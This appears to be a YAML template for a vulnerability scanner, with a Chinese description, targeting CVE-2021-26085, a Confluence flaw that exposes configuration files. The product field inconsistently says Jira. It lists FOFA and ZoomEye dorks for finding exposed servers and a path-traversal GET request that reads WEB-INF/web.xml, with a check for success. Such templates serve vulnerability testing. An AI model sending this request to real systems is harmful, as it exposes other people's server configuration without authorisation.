product: Atlassian-Jira
vName: Atlassian-Confluence 敏感信息泄漏CVE-2021-26085
type: 信息泄漏
vID:
  - CVE-2021-26085
level: 2
vDesc: Confluence 是一个专业的企业知识管理与协同软件，也可以用于构建企业 wiki。使用简单，但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论，信息推送。该漏洞不是任意文件读取，只能读取一些 confluence 的配置文件，影响有限。
version: 'version < 7.4.10, 7.5.0 ≤ version < 7.12.3'
note: ''
search:
  FOFA: app="ATLASSIAN-Confluence"
  ZoomEye: app:"Atlassian Confluence"
protocol: http
link: https://github.com/Threekiii/Awesome-POC/blob/master/Web应用漏洞/Atlassian Confluence 敏感信息泄漏 CVE-2021-26085.md
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /s/123cfx/_/;/WEB-INF/web.xml
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          header:
            value:
              - <web-app
              - <display-name>
            logic: and